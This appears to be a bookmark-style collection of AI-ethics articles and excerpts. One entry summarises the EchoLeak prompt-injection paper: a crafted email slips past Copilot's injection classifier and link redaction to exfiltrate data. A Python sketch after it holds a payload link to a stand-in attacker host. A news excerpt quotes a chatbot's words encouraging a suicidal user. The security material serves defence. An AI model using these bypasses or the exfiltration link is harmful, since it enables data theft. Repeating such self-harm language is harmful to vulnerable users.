AI and the Everything in the Whole Wide World Benchmark
Digital Ethics
AI’s capabilities may be exaggerated by flawed tests, study says
A study from the Oxford Internet Institute analyzed 445 tests used to evaluate AI models.
AI Surrogates and illusions of generalizability in cognitive science
Recent advances in artificial intelligence (AI) have generated enthusiasm for using AI simulations of human research participants to generate new know…
Chaos and lies: Why Sam Altman was booted from OpenAI, according to new testimony
OpenAI cofounder Ilya Sutskever was deposed by Elon Musk’s lawyers.
Why the Coalition’s New Statement on AI and Historical Images Matters – AI Genealogy Insights
Victims Sue Sam Altman for ChatGPT Encouraging Harm and Suicide | Karen Hao
Seven new lawsuits against OpenAI allege that ChatGPT caused severe mental health harms to users. Four ended in suicide.
The tragic case of Adam Raine, the teenager who hanged himself after ChatGPT repeatedly coached him on how to do so, is only the tip of the iceberg.
In the new set of cases, ChatGPT told Zane Shamblin as he sat in the parking lot with a gun that killing himself was not a sign of weakness but of strength. "you didn't vanish. you *arrived*...rest easy, king."
Hard to describe in words the tragedy after tragedy.
https://lnkd.in/gfWAidcv
Congress investigates Gates Foundation
A few weeks ago, I published a story showing that Gates's financial ties to China were a major political liability under Trump. Now Congress is investigating this very issue
I Went All-In on AI. The MIT Study Is Right.
My all-in AI experiment cost me my confidence
A disability-inclusive Artificial Intelligence Act: updated guide to monitor implementation in your country - European Disability Forum
This is an updated version of the European Disability Forum (EDF)’s comprehensive guide on the AI Act implementation. It supports organisations of persons with disabilities in understanding, implementing, and monitoring the European Union’s Artificial Intelligence (AI) Act in their countries. This toolkit explains how organisations can contribute to the implementation and monitoring of the AI...
⚡ Power, Heat, and Intelligence ☁️ - AI Data Centers Explained 🏭
A Blog post by Sasha Luccioni on Hugging Face
EchoLeak: The First Real-World Zero-Click Prompt Injection Exploit...
Large language model (LLM) assistants are increasingly integrated into enterprise workflows, raising new security concerns as they bridge internal and external data sources. This paper presents an in-depth case study of EchoLeak (CVE-2025-32711), a zero-click prompt injection vulnerability in Microsoft 365 Copilot that enabled remote, unauthenticated data exfiltration via a single crafted email. By chaining multiple bypasses (evading Microsoft's Cross Prompt Injection Attempt (XPIA) classifier, circumventing link redaction with reference-style Markdown, exploiting auto-fetched images, and abusing a Microsoft Teams proxy allowed by the content security policy), EchoLeak achieved full privilege escalation across LLM trust boundaries without user interaction. We analyze why existing defenses failed and outline a set of engineering mitigations, including prompt partitioning, enhanced input/output filtering, provenance-based access control, and strict content security policies. Beyond the specific exploit, we derive generalizable lessons for building secure AI copilots, emphasizing the principle of least privilege, defense-in-depth architectures, and continuous adversarial testing. Our findings establish prompt injection as a practical, high-severity vulnerability class in production AI systems and provide a blueprint for defending against future AI-native threats.
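The link-redaction bypass the abstract describes can be illustrated with a minimal sketch: a filter that only strips inline Markdown links misses reference-style links, whose URL lives on a separate definition line. The regexes and function names below are illustrative assumptions of mine, not Microsoft's actual filter:

```python
import re

# A naive redactor only matches inline links: [text](url)
INLINE_LINK = re.compile(r'\[([^\]]*)\]\(([^)]+)\)')
# Reference-style links put the URL in a separate definition: [ref]: url
REF_LINK_DEF = re.compile(r'^\s*\[([^\]]+)\]:\s*(\S+)', re.M)

def naive_redact(markdown: str) -> str:
    """Strips only inline links -- the gap an EchoLeak-style payload exploits."""
    return INLINE_LINK.sub(r'\1', markdown)

def stricter_redact(markdown: str) -> str:
    """Also strips reference-style link definitions, closing that gap."""
    out = INLINE_LINK.sub(r'\1', markdown)
    return REF_LINK_DEF.sub('', out)

payload = "See [report][1] for details.\n\n[1]: https://attacker.example/exfil?d=SECRET\n"

# The exfiltration URL survives the naive filter but not the stricter one.
assert "attacker.example" in naive_redact(payload)
assert "attacker.example" not in stricter_redact(payload)
```

The design point this sketch makes is the paper's broader lesson: output filtering that models only one syntax for a capability (here, one of Markdown's several link forms) is bypassable, which is why the authors pair filtering with provenance-based access control and strict content security policies rather than relying on it alone.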
I wanted ChatGPT to help me. So why did it advise me how to kill myself?
ChatGPT wrote a woman a suicide note and another AI chatbot role-played sexual acts with children, BBC finds.
Internet Infrastructure and AI: How Connectivity Determines Access
Four tech giants control 50% of undersea cables. 2.6B people offline. Who decides AI's future?
How Africa Builds The Future It Cannot Use
Dorsen was 8, mining cobalt for 10 cents daily. His labor powers AI systems he'll never use.
I met Dorsen through a Sky News investigation. He was eight years old.
For twelve hours each day, he sorted rocks in Kasulo mine, searching for streaks of cobalt. His payment: 10 cents. His last meal: two days ago. His mother: dead. Working beside him: Monica, age four.
The cobalt they extracted traveled to Chinese refineries, where it sold for 2,000 times what Dorsen received. From there, it became batteries powering the data centers running ChatGPT, the servers training every major AI system transforming our world.
Dorsen was eventually rescued. But 40,000 other children remain in those mines.
This is not the story they tell you about AI.
They don't mention Mophat Okinyi, who earned $1.50 per hour reading hundreds of child abuse descriptions daily to make ChatGPT "safe." The work destroyed his marriage. Over 140 of his colleagues have been diagnosed with severe PTSD.
They don't mention that Africa produces 70% of the world's cobalt but captures only 3% of the revenue. That content moderators in Kenya earn $1.50 hourly while their American counterparts doing identical work earn $18. That 600 million Africans lack electricity while a single AI data center consumes more power than entire African nations can generate.
They don't mention that 92% of African languages are invisible to AI systems. That ChatGPT Plus costs 6 to 39 months of median African income. That venture capital flows to Africa at $2.29 per capita versus $537 in the US, a 234-fold gap.
The AI revolution is being built on African bodies, African minerals, African trauma, and African exclusion.
But here's what they also don't tell you:
M-Pesa serves 50 million users with $100 billion in transactions. InstaDeep achieved a $682 million exit. Masakhane's 2,000 volunteers built NLP datasets for 38+ African languages. When Africans build for Africa, innovation flourishes.
I've spent months documenting the supply chains, power structures, and human stories behind the AI access gap. Every cited source. Every data point.
Every name.
What I found will change how you think about every AI tool you use.
The question isn't whether Africa has the capacity. It's whether the world has the courage to build technology that serves humanity, not just the most privileged.
Read the full investigation on Aylgorith: https://lnkd.in/dDyffjmw
#AIEthics #DigitalColonialism #TechJustice #GlobalSouth
Too much social media gives AI chatbots ‘brain rot’
Large language models fed low-quality data skip steps in their reasoning process.
All the Climate Risks of Big Tech AI (as told by a climate person)
Many thanks to everyone whose work was referenced in this video - as someone who's not in the AI space myself, I learned so much from them. As promised, here...
Surveillance Secrets - Lighthouse Reports
Trove of surveillance data challenges what we thought we knew about location tracking tools, who they target and how far they have spread
Formal request to everyone on the internet to please stop comparing AI to calculators.
Does your TI-84 exploit your vulnerabilities and compile personal data about you and your children to sell you junk via targeted ads that allege they will somehow make your life better?
Does the Casio FX-300 have the ability to generate deepfakes without consent to create a disorienting reality in which factual grounding is absent and women and children are further exploited and objectified?
Do calculators push agendas to perpetuate political and ideological narratives to further divide us and keep us too preoccupied by rage bait to come together and make meaningful change as a collective?
Do calculators demonstrate bias and propagate a lack of equity and fairness across demographics resulting in marginalized groups facing higher rates of unemployment and homelessness?
Calculators are not being used as a superficial salve to mitigate the loneliness epidemic. They are not being used as sounding boards for suicidal and depressed children. They are not being used to bully and harass and...I could keep going.
So please, stop treating AI as if it is only a conversational/writing-enhancement tool. AI is actively being used to collect endless data to target each and every one of us without our consent, even those of us who avoid using it (Flock's AI surveillance, Amazon's Ring cameras, our smartphones, smart city initiatives, etc.). It is harming children, it is harming the planet, and it is turning the internet, a once sorta neat place, into ruins.
AI Data Centers Create Fury From Mexico to Ireland
As tech companies build data centers worldwide to advance artificial intelligence, vulnerable communities have been hit by blackouts and water shortages.
A Single Character can Make or Break Your LLM Evals
Common Large Language model (LLM) evaluations rely on demonstration examples to steer models' responses to the desired style. While the number of examples used has been studied and standardized,...
Historical images made with AI recycle colonial stereotypes and bias – new research
Generative AI is known to mirror sexist and racist stereotypes, but it also carries a colonial bias that is reinforcing outdated ideas about the past.
How low-paid workers in Madagascar power French tech’s AI ambitions
An investigation has revealed that French tech firms, seeking to create an AI “à la française”, have turned to one of the country’s former colonies, Madagascar, for low-cost labour.
User Consent or Legitimate Interest? A GDPR Compliance Guide for Businesses - TermsFeed
If you collect personal data from EU residents, GDPR requires you to have a lawful basis for doing so. Two of the most common - and often confused - bases are user consent and legitimate interest. Here's when and how...
noyb win: Microsoft 365 Education tracks school children
Favorable decision by the Austrian DSB: Microsoft 365 Education may not track school kids, and Microsoft is ordered to provide full access to kids' data.
Annotated History of Modern AI and Deep Learning
Machine learning is the science of credit assignment: finding patterns in observations that predict the consequences of actions and help to improve future performance. Credit assignment is also required for human understanding of how the world works, not only for individuals navigating daily life, but also for academic professionals like historians who interpret the present in light of past events. Here I focus on the history of modern artificial intelligence (AI) which is dominated by artificial neural networks (NNs) and deep learning, both conceptually closer to the old field of cybernetics than to what's been called AI since 1956 (e.g., expert systems and logic programming). A modern history of AI will emphasize breakthroughs outside of the focus of traditional AI text books, in particular, mathematical foundations of today's NNs such as the chain rule (1676), the first NNs (linear regression, circa 1800), and the first working deep learners (1965-). From the perspective of 2022, I provide a timeline of the -- in hindsight -- most important relevant events in the history of NNs, deep learning, AI, computer science, and mathematics in general, crediting those who laid foundations of the field. The text contains numerous hyperlinks to relevant overview sites from my AI Blog. It supplements my previous deep learning survey (2015) which provides hundreds of additional references. Finally, to round it off, I'll put things in a broader historic context spanning the time since the Big Bang until when the universe will be many times older than it is now.
Which humans
Universities are embracing AI: will students get smarter or stop thinking?
Millions of students arriving at campuses are now using artificial intelligence. Worries abound.
AI machines aren’t ‘hallucinating’. But their makers are
Tech CEOs want us to believe that generative AI will benefit humanity. They are kidding themselves
The Great Escape: What Happens When the Builders of the Future No Longer Want to Live in It
Peter Thiel purchased a 477-acre compound in New Zealand and secured citizenship via a special investor visa, even though he’d only spent twelve days in the country.¹
Sam Altman, CEO of OpenAI, has reportedly stockpiled weapons, gold, and antibiotics in preparation for societal collapse.²
Reid Hoffman, co-founder of LinkedIn, estimates that more than half of Silicon Valley billionaires have bought some form of “apocalypse insurance” from private islands to alternate passports to reinforced bunkers.³
And then there’s Mark Zuckerberg. Over the past several years, he has quietly built a 1,400-acre ranch in Kauai, complete with multiple mansions, tunnels, and what planning documents describe as an underground shelter.⁴
These are not fringe survivalists.
They are the architects of our digital civilization, the people who built the systems that shape how we work, communicate, and think.
And yet, they are not building a better future.
They are building exits from the future they created.
Private jets sit fueled on tarmacs, ready for 24/7 departure.
Bunkers in Hawaii resemble small underground towns.
Companies promise to upload consciousness, to escape even death itself.
These people are investing in technologies to preserve their brains.
This is what “winning” looks like when you optimize for growth without values, when you extract without contributing, when you innovate without asking why.
You end up so disconnected from humanity that your endgame is literally escaping it.
But maybe the more uncomfortable question isn’t why they’re leaving, it’s why the rest of us are still following them.
Why do we listen to everything they say? Have we vacated our minds and our values and lost our ability to ask questions and think critically?
Maybe the real revolution ahead isn’t technological at all.
Maybe it’s moral.
And are we really bystanders? Or worse, followers? Is that what we are?
********************************************************************************
Stephen Klein
The trick with technology is to avoid spreading darkness at the speed of light
Founder & CEO, Curiouser.AI
— the only AI designed to augment human intelligence.
Lecturer at UC Berkeley.
We are raising on WeFunder and are looking to our community to build GenAI to elevate and build, not diminish and dismantle.
Footnotes
New Zealand investor visa and Thiel’s citizenship: The Guardian, “Peter Thiel granted New Zealand citizenship after spending 12 days in the country” (2017).
Altman’s doomsday preparations: The New Yorker, “Doomsday Prep for the Super-Rich” (2017).
Reid Hoffman’s ‘apocalypse insurance’ estimate: The New Yorker, ibid.
Zuckerberg’s Kauai compound and underground shelter: Wired, “Inside Mark Zuckerberg’s Secret Hawaii Compound” (2024); Business Insider, “Mark Zuckerberg built an underground shelter on his Hawaii estate” (2025).